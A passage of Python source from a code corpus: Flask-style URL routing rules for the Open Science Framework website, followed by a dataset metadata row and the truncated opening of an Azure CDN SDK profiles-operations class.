Rule(
'/<path:_>',
['get', 'post'],
HTTPError(http.NOT_FOUND),
OsfWebRenderer('', render_mako_string, trust=False)
),
Rule(
'/api/v1/<path:_>',
['get', 'post'],
HTTPError(http.NOT_FOUND),
json_renderer
),
])
### GUID ###
process_rules(app, [
Rule(
[
'/<guid>/',
'/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
notemplate,
),
Rule(
[
'/api/v1/<guid>/',
'/api/v1/<guid>/<path:suffix>',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid,
json_renderer,
),
])
# Static files
process_rules(app, [
Rule('/favicon.ico', 'get', favicon, json_renderer),
Rule('/robots.txt', 'get', robots, json_renderer),
Rule('/sitemaps/<path>', 'get', sitemap_file, json_renderer),
])
# Ember Applications
if settings.USE_EXTERNAL_EMBER:
# Routes that serve up the Ember application. Hide behind feature flag.
for prefix in EXTERNAL_EMBER_APPS.keys():
process_rules(app, [
Rule(
[
'/<provider>/<guid>/download',
'/<provider>/<guid>/download/',
],
['get', 'post', 'put', 'patch', 'delete'],
website_views.resolve_guid_download,
notemplate,
endpoint_suffix='__' + prefix
),
], prefix='/' + prefix)
process_rules(app, [
Rule(
[
'/',
'/<path:path>',
],
'get',
ember_app,
json_renderer,
endpoint_suffix='__' + prefix
),
], prefix='/' + prefix)
if EXTERNAL_EMBER_APPS.get('ember_osf_web'):
process_rules(app, [
Rule(
ember_osf_web_views.routes,
'get',
ember_osf_web_views.use_ember_app,
notemplate
)
])
if 'routes' in EXTERNAL_EMBER_APPS['ember_osf_web']:
for route in EXTERNAL_EMBER_APPS['ember_osf_web']['routes']:
process_rules(app, [
Rule(
[
'/',
'/<path:path>',
],
'get',
ember_osf_web_views.use_ember_app,
notemplate,
endpoint_suffix='__' + route
)
], prefix='/' + route)
### Base ###
process_rules(app, [
Rule(
'/dashboard/',
'get',
website_views.dashboard,
notemplate
),
Rule(
'/myprojects/',
'get',
website_views.my_projects,
OsfWebRenderer('my_projects.mako', trust=False)
),
Rule(
'/reproducibility/',
'get',
website_views.reproducibility,
notemplate
),
Rule('/about/', 'get', website_views.redirect_about, notemplate),
Rule('/help/', 'get', website_views.redirect_help, notemplate),
Rule('/faq/', 'get', website_views.redirect_faq, notemplate),
Rule(['/getting-started/', '/getting-started/email/', '/howosfworks/'], 'get', website_views.redirect_getting_started, notemplate),
Rule(
'/explore/',
'get',
discovery_views.redirect_explore_to_activity,
notemplate
),
Rule(
[
'/messages/',
],
'get',
{},
OsfWebRenderer('public/comingsoon.mako', trust=False)
),
Rule(
'/view/<meeting>/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting.mako', trust=False),
),
Rule(
'/view/<meeting>/plain/',
'get',
conference_views.conference_results,
OsfWebRenderer('public/pages/meeting_plain.mako', trust=False),
endpoint_suffix='__plain',
),
Rule(
'/api/v1/view/<meeting>/',
'get',
conference_views.conference_data,
json_renderer,
),
Rule(
'/meetings/',
'get',
conference_views.conference_view,
OsfWebRenderer('public/pages/meeting_landing.mako', trust=False),
),
Rule(
'/api/v1/meetings/submissions/',
'get',
conference_views.conference_submissions,
json_renderer,
),
Rule(
'/presentations/',
'get',
conference_views.redirect_to_meetings,
json_renderer,
),
Rule(
'/news/',
'get',
website_views.redirect_to_cos_news,
notemplate
),
Rule(
[
'/rr/',
'/registeredreports/',
'/registeredreport/',
],
'get',
registries_views.registered_reports_landing,
OsfWebRenderer('registered_reports_landing.mako', trust=False)
),
Rule(
'/erpc/',
'get',
closed_challenges_views.erpc_landing_page,
OsfWebRenderer('erpc_landing_page.mako', trust=False)
),
Rule(
'/prereg/',
'get',
prereg.prereg_landing_page,
OsfWebRenderer('prereg_landing_page.mako', trust=False)
),
Rule(
'/preprints/',
'get',
preprint_views.preprint_landing_page,
OsfWebRenderer('public/pages/preprint_landing.mako', trust=False),
),
Rule(
'/registries/',
'get',
registries_views.registries_landing_page,
OsfWebRenderer('public/pages/registries_landing.mako', trust=False),
),
Rule(
'/reviews/',
'get',
reviews_views.reviews_landing_page,
OsfWebRenderer('public/pages/reviews_landing.mako', trust=False),
),
Rule(
'/preprint/',
'get',
preprint_views.preprint_redirect,
notemplate,
),
Rule(
[
'/api/v1/<campaign>/draft_registrations/',
'/api/v1/draft_registrations/'
],
'get',
registries_views.draft_registrations,
json_renderer,
),
])
# Site-wide API routes
process_rules(app, [
Rule(
'/citations/styles/',
'get',
citation_views.list_citation_styles,
json_renderer,
),
], prefix='/api/v1')
process_rules(app, [
Rule(
[
'/project/<pid>/<addon>/settings/disable/',
'/project/<pid>/node/<nid>/<addon>/settings/disable/',
],
'post',
addon_views.disable_addon,
json_renderer,
),
Rule(
'/profile/<uid>/<addon>/settings/',
'get',
addon_views.get_addon_user_config,
json_renderer,
),
], prefix='/api/v1')
# OAuth
process_rules(app, [
Rule(
'/oauth/connect/<service_name>/',
'get',
oauth_views.oauth_connect,
json_renderer,
),
Rule(
'/oauth/callback/<service_name>/',
'get',
oauth_views.oauth_callback,
OsfWebRenderer('util/oauth_complete.mako', trust=False),
),
])
process_rules(app, [
Rule(
[
'/oauth/accounts/<external_account_id>/',
],
'delete',
oauth_views.oauth_disconnect,
json_renderer,
)
], prefix='/api/v1')
process_rules(app, [
Rule('/confirmed_emails/', 'put', auth_views.unconfirmed_email_add, json_renderer),
Rule('/confirmed_emails/', 'delete', auth_views.unconfirmed_email_remove, json_renderer)
], prefix='/api/v1')
### Metadata ###
process_rules(app, [
Rule(
[
'/project/<pid>/comments/timestamps/',
'/project/<pid>/node/<nid>/comments/timestamps/',
],
'put',
project_views.comment.update_comments_timestamp,
json_renderer,
),
Rule(
[
'/project/<pid>/citation/',
'/project/<pid>/node/<nid>/citation/',
],
'get',
citation_views.node_citation,
json_renderer,
),
], prefix='/api/v1')
### Forms ###
process_rules(app, [
Rule('/forms/signin/', 'get', website_views.signin_form, json_renderer),
Rule('/forms/forgot_password/', 'get', website_views.forgot_password_form, json_renderer),
], prefix='/api/v1')
### Discovery ###
process_rules(app, [
Rule(
'/explore/activity/',
'get',
discovery_views.redirect_explore_activity_to_activity,
notemplate
),
Rule(
'/activity/',
'get',
discovery_views.activity,
OsfWebRenderer('public/pages/active_nodes.mako', trust=False)
),
])
### Auth ###
process_rules(app, [
# confirm email
Rule(
'/confirm/<uid>/<token>/',
'get',
auth_views.confirm_email_get,
notemplate
),
# confirm email for login through external identity provider
Rule(
'/confirm/external/<uid>/<token>/',
'get',
auth_views.external_login_confirm_email_get,
notemplate
),
# reset password get
Rule(
'/resetpassword/<uid>/<token>/',
'get',
auth_views.reset_password_get,
OsfWebRenderer('public/resetpassword.mako', render_mako_string, trust=False)
),
# reset password post
Rule(
'/resetpassword/<uid>/<token>/',
'post',
auth_views.reset_password_post,
OsfWebRenderer('public/resetpassword.mako', render_mako_string, trust=False)
),
# resend confirmation get
Rule(
'/resend/',
'get',
auth_views.resend_confirmation_get,
OsfWebRenderer('resend.mako', render_mako_string, trust=False)
),
# resend confirmation post
Rule(
'/resend/',
'post',
auth_views.resend_confirmation_post,
OsfWebRenderer('resend.mako', render_mako_string, trust=False)
),
# oauth user email get
Rule(
'/external-login/email',
'get',
auth_views.external_login_email_get,
OsfWebRenderer('external_login_email.mako', render_mako_string, trust=False)
),
# oauth user email post
Rule(
'/external-login/email',
'post',
auth_views.external_login_email_post,
OsfWebRenderer('external_login_email.mako', render_mako_string, trust=False)
),
# user sign up page
Rule(
'/register/',
'get',
auth_views.auth_register,
OsfWebRenderer('public/register.mako', trust=False)
),
# osf login and campaign login
Rule(
[
'/login/',
'/account/'
],
'get',
auth_views.auth_login,
notemplate
),
# create user account via api
Rule(
'/api/v1/register/',
'post',
auth_views.register_user,
json_renderer
),
# osf logout and cas logout
Rule(
'/logout/',
'get',
auth_views.auth_logout,
notemplate
),
# forgot password get
Rule(
'/forgotpassword/',
'get',
auth_views.forgot_password_get,
OsfWebRenderer('public/forgot_password.mako', trust=False)
),
# forgot password post
Rule(
'/forgotpassword/',
'post',
auth_views.forgot_password_post,
OsfWebRenderer('public/forgot_password.mako', trust=False)
),
Rule(
'/login/connected_tools/',
'get',
landing_page_views.connected_tools,
notemplate
),
Rule(
'/login/enriched_profile/',
'get',
landing_page_views.enriched_profile,
notemplate
),
])
### Profile ###
# Web
process_rules(app, [
Rule(
'/profile/',
'get',
profile_views.profile_view,
OsfWebRenderer('profile.mako', trust=False)
),
Rule(
'/profile/<uid>/',
'get',
profile_views.profile_view_id,
OsfWebRenderer('profile.mako', trust=False)
),
# unregistered user claim account (contributor-ship of a project)
# user will be required to set email and password
# claim token must be present in query parameter
Rule(
['/user/<uid>/<pid>/claim/'],
['get', 'post'],
project_views.contributor.claim_user_form,
OsfWebRenderer('claim_account.mako', trust=False)
),
# registered user claim account (contributor-ship of a project)
# user will be required to verify password
# claim token must be present in query parameter
Rule(
['/user/<uid>/<pid>/claim/verify/<token>/'],
['get', 'post'],
project_views.contributor.claim_user_registered,
OsfWebRenderer('claim_account_registered.mako', trust=False)
),
Rule(
'/settings/',
'get',
profile_views.user_profile,
OsfWebRenderer('profile/settings.mako', trust=False),
),
Rule(
[
'/project/<pid>/addons/',
'/project/<pid>/node/<nid>/addons/',
],
'get',
project_views.node.node_addons,
OsfWebRenderer('project/addons.mako', trust=False)
),
Rule(
'/settings/account/',
'get',
profile_views.user_account,
OsfWebRenderer('profile/account.mako', trust=False),
),
Rule(
'/settings/account/password',
'post',
profile_views.user_account_password,
OsfWebRenderer('profile/account.mako', trust=False),
),
Rule(
'/settings/addons/',
'get',
profile_views.user_addons,
OsfWebRenderer('profile/addons.mako', trust=False),
),
Rule(
'/settings/notifications/',
'get',
profile_views.user_notifications,
OsfWebRenderer('profile/notifications.mako', trust=False),
),
Rule(
'/settings/applications/',
'get',
profile_views.oauth_application_list,
OsfWebRenderer('profile/oauth_app_list.mako', trust=False)
),
Rule(
'/settings/applications/create/',
'get',
profile_views.oauth_application_register,
OsfWebRenderer('profile/oauth_app_detail.mako', trust=False)
),
Rule(
'/settings/applications/<client_id>/',
'get',
profile_views.oauth_application_detail,
OsfWebRenderer('profile/oauth_app_detail.mako', trust=False)
),
Rule(
'/settings/tokens/',
'get',
profile_views.personal_access_token_list,
OsfWebRenderer('profile/personal_tokens_list.mako', trust=False)
),
Rule(
'/settings/tokens/create/',
'get',
profile_views.personal_access_token_register,
OsfWebRenderer('profile/personal_tokens_detail.mako', trust=False)
),
Rule(
'/settings/tokens/<_id>/',
'get',
profile_views.personal_access_token_detail,
OsfWebRenderer('profile/personal_tokens_detail.mako', trust=False)
)
])
# API
process_rules(app, [
Rule('/profile/', 'get', profile_views.profile_view_json, json_renderer),
Rule('/profile/', 'put', profile_views.update_user, json_renderer),
Rule('/resend/', 'put', profile_views.resend_confirmation, json_renderer),
Rule('/profile/<uid>/', 'get', profile_views.profile_view_id_json, json_renderer),
# Used by profile.html
Rule('/user/<uid>/<pid>/claim/email/', 'post',
project_views.contributor.claim_user_post, json_renderer),
Rule(
'/profile/export/',
'post',
profile_views.request_export,
json_renderer,
),
Rule(
'/profile/region/',
'put',
osfstorage_views.update_region,
json_renderer,
),
Rule(
'/profile/deactivate/',
'post',
profile_views.request_deactivation,
json_renderer,
),
Rule(
'/profile/cancel_request_deactivation/',
'post',
profile_views.cancel_request_deactivation,
json_renderer,
),
Rule(
'/profile/logins/',
'patch',
profile_views.delete_external_identity,
json_renderer,
),
# Rules for user profile configuration
Rule('/settings/names/', 'get', profile_views.serialize_names, json_renderer),
Rule('/settings/names/', 'put', profile_views.unserialize_names, json_renderer),
Rule('/settings/names/impute/', 'get', profile_views.impute_names, json_renderer),
Rule(
[
'/settings/social/',
'/settings/social/<uid>/',
],
'get',
profile_views.serialize_social,
json_renderer,
),
Rule(
[
'/settings/jobs/',
'/settings/jobs/<uid>/',
],
'get',
profile_views.serialize_jobs,
json_renderer,
),
Rule(
[
'/settings/schools/',
'/settings/schools/<uid>/',
],
'get',
profile_views.serialize_schools,
json_renderer,
),
Rule(
[
'/settings/social/',
'/settings/social/<uid>/',
],
'put',
profile_views.unserialize_social,
json_renderer
),
Rule(
[
'/settings/jobs/',
'/settings/jobs/<uid>/',
],
'put',
profile_views.unserialize_jobs,
json_renderer
),
Rule(
[
'/settings/schools/',
'/settings/schools/<uid>/',
],
'put',
profile_views.unserialize_schools,
json_renderer
),
], prefix='/api/v1',)
### Search ###
# Web
process_rules(app, [
Rule(
'/search/',
'get',
search_views.search_view,
OsfWebRenderer('search.mako', trust=False)
),
Rule(
'/share/registration/',
'get',
{'register': settings.SHARE_REGISTRATION_URL},
json_renderer
),
Rule(
'/api/v1/user/search/',
'get', search_views.search_contributor,
json_renderer
),
Rule(
'/api/v1/search/node/',
'post',
project_views.node.search_node,
json_renderer,
),
])
# API
process_rules(app, [
Rule(['/search/', '/search/<type>/'], ['get', 'post'], search_views.search_search, json_renderer),
Rule('/search/projects/', 'get', search_views.search_projects_by_title, json_renderer),
Rule('/share/search/', 'get', website_views.legacy_share_v1_search, json_renderer),
], prefix='/api/v1')
# Institution
process_rules(app, [
Rule('/institutions/<inst_id>/', 'get', institution_views.view_institution, OsfWebRenderer('institution.mako', trust=False))
])
# Project
# Web
process_rules(app, [
Rule('/', 'get', website_views.index, OsfWebRenderer('institution.mako', trust=False)),
Rule('/goodbye/', 'get', goodbye, notemplate),
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'get',
project_views.node.view_project,
OsfWebRenderer('project/project.mako', trust=False)
),
# Create a new subproject/component
Rule(
'/project/<pid>/newnode/',
'post',
project_views.node.project_new_node,
notemplate
),
Rule('/project/new/<pid>/beforeTemplate/', 'get',
project_views.node.project_before_template, json_renderer),
Rule(
[
'/project/<pid>/contributors/',
'/project/<pid>/node/<nid>/contributors/',
],
'get',
project_views.node.node_contributors,
OsfWebRenderer('project/contributors.mako', trust=False),
),
Rule(
[
'/project/<pid>/settings/',
'/project/<pid>/node/<nid>/settings/',
],
'get',
project_views.node.node_setting,
OsfWebRenderer('project/settings.mako', trust=False)
),
# Permissions
Rule( # TODO: Where, if anywhere, is this route used?
[
'/project/<pid>/permissions/<permissions>/',
'/project/<pid>/node/<nid>/permissions/<permissions>/',
],
'post',
project_views.node.project_set_privacy,
OsfWebRenderer('project/project.mako', trust=False)
),
# View forks
Rule(
[
'/project/<pid>/forks/',
'/project/<pid>/node/<nid>/forks/',
],
'get',
project_views.node.node_forks,
notemplate,
),
# Registrations
Rule(
[
'/project/<pid>/register/',
'/project/<pid>/node/<nid>/register/',
],
'get',
project_views.register.node_register_page,
OsfWebRenderer('project/register.mako', trust=False)
),
Rule(
[
'/project/<pid>/register/<metaschema_id>/',
'/project/<pid>/node/<nid>/register/<metaschema_id>/',
],
'get',
project_views.register.node_register_template_page,
OsfWebRenderer('project/register.mako', trust=False)
),
Rule(
[
'/project/<pid>/registrations/',
'/project/<pid>/node/<nid>/registrations/',
],
'get',
project_views.node.node_registrations,
OsfWebRenderer('project/registrations.mako', trust=False)
),
Rule(
[
'/project/<pid>/registrations/',
'/project/<pid>/node/<nid>/registrations/',
],
'post',
project_views.drafts.new_draft_registration,
OsfWebRenderer('project/edit_draft_registration.mako', trust=False)),
Rule(
[
'/project/<pid>/drafts/<draft_id>/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/',
],
'get',
project_views.drafts.edit_draft_registration_page,
OsfWebRenderer('project/edit_draft_registration.mako', trust=False)),
Rule(
[
'/project/<pid>/drafts/<draft_id>/register/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/register/',
],
'get',
project_views.drafts.draft_before_register_page,
OsfWebRenderer('project/register_draft.mako', trust=False)),
Rule(
[
'/project/<pid>/retraction/',
'/project/<pid>/node/<nid>/retraction/',
],
'get',
project_views.register.node_registration_retraction_redirect,
notemplate,
),
Rule(
[
'/project/<pid>/withdraw/',
'/project/<pid>/node/<nid>/withdraw/',
],
'get',
project_views.register.node_registration_retraction_get,
OsfWebRenderer('project/retract_registration.mako', trust=False)
),
Rule(
'/ids/<category>/<path:value>/',
'get',
project_views.register.get_referent_by_identifier,
notemplate,
),
Rule(
[
'/project/<pid>/analytics/',
'/project/<pid>/node/<nid>/analytics/',
],
'get',
project_views.node.project_statistics,
notemplate,
),
### Files ###
# Note: Web endpoint for files view must pass `mode` = `page` to
# include project view data and JS includes
# TODO: Start waterbutler to test
Rule(
[
'/project/<pid>/files/',
'/project/<pid>/node/<nid>/files/',
],
'get',
project_views.file.collect_file_trees,
OsfWebRenderer('project/files.mako', trust=False),
view_kwargs={'mode': 'page'},
),
Rule(
[
'/<guid>/files/<provider>/<path:path>/',
'/project/<pid>/files/<provider>/<path:path>/',
'/project/<pid>/node/<nid>/files/<provider>/<path:path>/',
],
'get',
addon_views.addon_view_or_download_file,
OsfWebRenderer('project/view_file.mako', trust=False)
),
Rule(
'/download/<fid_or_guid>/',
'get',
addon_views.persistent_file_download,
json_renderer,
),
Rule(
[
'/api/v1/<guid>/files/<provider>/<path:path>/',
'/api/v1/project/<pid>/files/<provider>/<path:path>/',
'/api/v1/project/<pid>/node/<nid>/files/<provider>/<path:path>/',
],
'get',
addon_views.addon_view_or_download_file,
json_renderer
),
Rule(
[
'/project/<pid>/files/deleted/<trashed_id>/',
'/project/<pid>/node/<nid>/files/deleted/<trashed_id>/',
],
'get',
addon_views.addon_deleted_file,
OsfWebRenderer('project/view_file.mako', trust=False)
),
Rule(
[
# Legacy Addon view file paths
'/project/<pid>/<provider>/files/<path:path>/',
'/project/<pid>/node/<nid>/<provider>/files/<path:path>/',
'/project/<pid>/<provider>/files/<path:path>/download/',
'/project/<pid>/node/<nid>/<provider>/files/<path:path>/download/',
# Legacy routes for `download_file`
'/project/<pid>/osffiles/<fid>/download/',
'/project/<pid>/node/<nid>/osffiles/<fid>/download/',
# Legacy routes for `view_file`
'/project/<pid>/osffiles/<fid>/',
'/project/<pid>/node/<nid>/osffiles/<fid>/',
# Note: Added these old URLs for backwards compatibility with
# hard-coded links.
'/project/<pid>/osffiles/download/<fid>/',
'/project/<pid>/node/<nid>/osffiles/download/<fid>/',
'/project/<pid>/files/<fid>/',
'/project/<pid>/node/<nid>/files/<fid>/',
'/project/<pid>/files/download/<fid>/',
'/project/<pid>/node/<nid>/files/download/<fid>/',
# Legacy routes for `download_file_by_version`
'/project/<pid>/osffiles/<fid>/version/<vid>/download/',
'/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/download/',
# Note: Added these old URLs for backwards compatibility with
# hard-coded links.
'/project/<pid>/osffiles/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/',
'/project/<pid>/osffiles/download/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/osffiles/download/<fid>/version/<vid>/',
'/project/<pid>/files/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/files/<fid>/version/<vid>/',
'/project/<pid>/files/download/<fid>/version/<vid>/',
'/project/<pid>/node/<nid>/files/download/<fid>/version/<vid>/',
],
'get',
addon_views.addon_view_or_download_file_legacy,
OsfWebRenderer('project/view_file.mako', trust=False),
),
Rule(
[
# api/v1 Legacy routes for `download_file`
'/api/v1/project/<pid>/osffiles/<fid>/',
'/api/v1/project/<pid>/node/<nid>/osffiles/<fid>/',
'/api/v1/project/<pid>/files/download/<fid>/',
'/api/v1/project/<pid>/node/<nid>/files/download/<fid>/',
#api/v1 Legacy routes for `download_file_by_version`
'/api/v1/project/<pid>/osffiles/<fid>/version/<vid>/',
'/api/v1/project/<pid>/node/<nid>/osffiles/<fid>/version/<vid>/',
'/api/v1/project/<pid>/files/download/<fid>/version/<vid>/',
'/api/v1/project/<pid>/node/<nid>/files/download/<fid>/version/<vid>/',
],
'get',
addon_views.addon_view_or_download_file_legacy,
json_renderer
),
Rule(
[
'/quickfiles/<fid>/'
],
'get',
addon_views.addon_view_or_download_quickfile,
json_renderer
)
])
# API
process_rules(app, [
Rule(
'/email/meeting/',
'post',
conference_views.meeting_hook,
json_renderer,
),
Rule('/mailchimp/hooks/', 'get', profile_views.mailchimp_get_endpoint, json_renderer),
Rule('/mailchimp/hooks/', 'post', profile_views.sync_data_from_mailchimp, json_renderer),
# Create project, used by [coming replacement]
Rule('/project/new/', 'post', project_views.node.project_new_post, json_renderer),
Rule([
'/project/<pid>/contributors_abbrev/',
'/project/<pid>/node/<nid>/contributors_abbrev/',
], 'get', project_views.contributor.get_node_contributors_abbrev, json_renderer),
Rule('/tags/<tag>/', 'get', project_views.tag.project_tag, json_renderer),
Rule([
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
], 'get', project_views.node.view_project, json_renderer),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>/pointer/',
],
'get',
project_views.node.get_pointed,
json_renderer,
),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>/pointer/',
],
'post',
project_views.node.add_pointers,
json_renderer,
),
Rule(
[
'/pointer/',
],
'post',
project_views.node.add_pointer,
json_renderer,
),
Rule(
[
'/project/<pid>/pointer/',
'/project/<pid>/node/<nid>pointer/',
],
'delete',
project_views.node.remove_pointer,
json_renderer,
),
# Draft Registrations
Rule([
'/project/<pid>/drafts/',
], 'get', project_views.drafts.get_draft_registrations, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'get', project_views.drafts.get_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'put', project_views.drafts.update_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/',
], 'delete', project_views.drafts.delete_draft_registration, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/submit/',
], 'post', project_views.drafts.submit_draft_for_review, json_renderer),
# Meta Schemas
Rule([
'/project/drafts/schemas/',
], 'get', project_views.drafts.get_metaschemas, json_renderer),
Rule([
'/project/<pid>/get_contributors/',
'/project/<pid>/node/<nid>/get_contributors/',
], 'get', project_views.contributor.get_contributors, json_renderer),
Rule([
'/project/<pid>/get_contributors_from_parent/',
'/project/<pid>/node/<nid>/get_contributors_from_parent/',
], 'get', project_views.contributor.get_contributors_from_parent, json_renderer),
# Reorder contributors
Rule(
[
'/project/<pid>/contributors/manage/',
'/project/<pid>/node/<nid>/contributors/manage/',
],
'POST',
project_views.contributor.project_manage_contributors,
json_renderer,
),
Rule(
[
'/project/<pid>/contributor/remove/',
'/project/<pid>/node/<nid>/contributor/remove/',
],
'POST',
project_views.contributor.project_remove_contributor,
json_renderer,
),
Rule([
'/project/<pid>/get_editable_children/',
'/project/<pid>/node/<nid>/get_editable_children/',
], 'get', project_views.node.get_editable_children, json_renderer),
# Private Link
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'post', project_views.node.project_generate_private_link_post, json_renderer),
Rule([
'/project/<pid>/private_link/edit/',
'/project/<pid>/node/<nid>/private_link/edit/',
], 'put', project_views.node.project_private_link_edit, json_renderer),
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'delete', project_views.node.remove_private_link, json_renderer),
Rule([
'/project/<pid>/private_link/',
'/project/<pid>/node/<nid>/private_link/',
], 'get', project_views.node.private_link_table, json_renderer),
# Create, using existing project as a template
Rule([
'/project/new/<nid>/',
], 'post', project_views.node.project_new_from_template, json_renderer),
# Update
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'put',
project_views.node.update_node,
json_renderer,
),
# Remove
Rule(
[
'/project/<pid>/',
'/project/<pid>/node/<nid>/',
],
'delete',
project_views.node.component_remove,
json_renderer,
),
# Reorder components
Rule('/project/<pid>/reorder_components/', 'post',
project_views.node.project_reorder_components, json_renderer),
# Edit node
Rule([
'/project/<pid>/edit/',
'/project/<pid>/node/<nid>/edit/',
], 'post', project_views.node.edit_node, json_renderer),
# Add / remove tags
Rule([
'/project/<pid>/tags/',
'/project/<pid>/node/<nid>/tags/',
'/project/<pid>/tags/<tag>/',
'/project/<pid>/node/<nid>/tags/<tag>/',
], 'post', project_views.tag.project_add_tag, json_renderer),
Rule([
'/project/<pid>/tags/',
'/project/<pid>/node/<nid>/tags/',
'/project/<pid>/tags/<tag>/',
'/project/<pid>/node/<nid>/tags/<tag>/',
], 'delete', project_views.tag.project_remove_tag, json_renderer),
# Add / remove contributors
Rule([
'/project/<pid>/contributors/',
'/project/<pid>/node/<nid>/contributors/',
], 'post', project_views.contributor.project_contributors_post, json_renderer),
# Forks
Rule(
[
'/project/<pid>/fork/before/',
'/project/<pid>/node/<nid>/fork/before/',
], 'get', project_views.node.project_before_fork, json_renderer,
),
Rule(
[
'/project/<pid>/pointer/fork/',
'/project/<pid>/node/<nid>/pointer/fork/',
], 'post', project_views.node.fork_pointer, json_renderer,
),
# Registrations
Rule([
'/project/<pid>/beforeregister/',
'/project/<pid>/node/<nid>/beforeregister',
], 'get', project_views.register.project_before_register, json_renderer),
Rule([
'/project/<pid>/drafts/<draft_id>/register/',
'/project/<pid>/node/<nid>/drafts/<draft_id>/register/',
], 'post', project_views.drafts.register_draft_registration, json_renderer),
Rule([
'/project/<pid>/withdraw/',
'/project/<pid>/node/<nid>/withdraw/'
], 'post', project_views.register.node_registration_retraction_post, json_renderer),
Rule(
[
'/project/<pid>/identifiers/',
'/project/<pid>/node/<nid>/identifiers/',
],
'post',
identifier_views.node_identifiers_post,
json_renderer,
),
# Endpoint to fetch Rubeus.JS/Hgrid-formatted data
Rule(
[
'/project/<pid>/files/grid/',
'/project/<pid>/node/<nid>/files/grid/'
],
'get',
project_views.file.grid_data,
json_renderer
),
# Settings
Rule(
'/files/auth/',
'get',
addon_views.get_auth,
json_renderer,
),
Rule(
[
'/project/<pid>/waterbutler/logs/',
'/project/<pid>/node/<nid>/waterbutler/logs/',
],
'put',
addon_views.create_waterbutler_log,
json_renderer,
),
Rule(
[
'/registration/<pid>/callbacks/',
],
'put',
project_views.register.registration_callbacks,
json_renderer,
),
Rule(
'/settings/addons/',
'post',
profile_views.user_choose_addons,
json_renderer,
),
Rule(
'/settings/notifications/',
'get',
profile_views.user_notifications,
json_renderer,
),
Rule(
'/settings/notifications/',
'post',
profile_views.user_choose_mailing_lists,
json_renderer,
),
Rule(
'/subscriptions/',
'get',
notification_views.get_subscriptions,
json_renderer,
),
Rule(
[
'/project/<pid>/subscriptions/',
'/project/<pid>/node/<nid>/subscriptions/'
],
'get',
notification_views.get_node_subscriptions,
json_renderer,
),
Rule(
[
'/project/<pid>/tree/',
'/project/<pid>/node/<nid>/tree/'
],
'get',
project_views.node.get_node_tree,
json_renderer,
),
Rule(
'/subscriptions/',
'post',
notification_views.configure_subscription,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/addons/',
'/project/<pid>/node/<nid>/settings/addons/',
],
'post',
project_views.node.node_choose_addons,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/comments/',
'/project/<pid>/node/<nid>/settings/comments/',
],
'post',
project_views.node.configure_comments,
json_renderer,
),
Rule(
[
'/project/<pid>/settings/requests/',
'/project/<pid>/node/<nid>/settings/requests/',
],
'post',
project_views.node.configure_requests,
json_renderer,
),
# Invite Users
Rule(
[
'/project/<pid>/invite_contributor/',
'/project/<pid>/node/<nid>/invite_contributor/'
],
'post',
project_views.contributor.invite_contributor_post,
json_renderer
)
], prefix='/api/v1')
# Set up static routing for addons and providers
# NOTE: We use nginx to serve static addon assets in production
addon_base_path = os.path.abspath('addons')
provider_static_path = os.path.abspath('assets')
if settings.DEV_MODE:
@app.route('/static/addons/<addon>/<path:filename>')
def addon_static(addon, filename):
addon_path = os.path.join(addon_base_path, addon, 'static')
return send_from_directory(addon_path, filename)
@app.route('/assets/<filename>')
def provider_static(filename):
return send_from_directory(provider_static_path, filename)
@app.route('/ember-cli-live-reload.js')
def ember_cli_live_reload():
req = requests.get('{}/ember-cli-live-reload.js'.format(settings.LIVE_RELOAD_DOMAIN), stream=True)
return Response(stream_with_context(req.iter_content()), content_type=req.headers['content-type'])
| apache-2.0 | -9,182,283,988,473,625,000 | 30.407534 | 182 | 0.509414 | false |
lmazuel/azure-sdk-for-python | azure-mgmt-cdn/azure/mgmt/cdn/operations/profiles_operations.py | 1 | 36221 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrest.exceptions import DeserializationError
from msrestazure.azure_operation import AzureOperationPoller
from .. import models
class ProfilesOperations(object):
"""ProfilesOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Version of the API to be used with the client request. Current version is 2017-04-02. Constant value: "2017-04-02".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2017-04-02"
self.config = config
def list(
self, custom_headers=None, raw=False, **operation_config):
"""Lists all of the CDN profiles within an Azure subscription.
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of Profile
:rtype:
~azure.mgmt.cdn.models.ProfilePaged[~azure.mgmt.cdn.models.Profile]
:raises:
:class:`ErrorResponseException<azure.mgmt.cdn.models.ErrorResponseException>`
"""
def internal_paging(next_link=None, raw=False):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
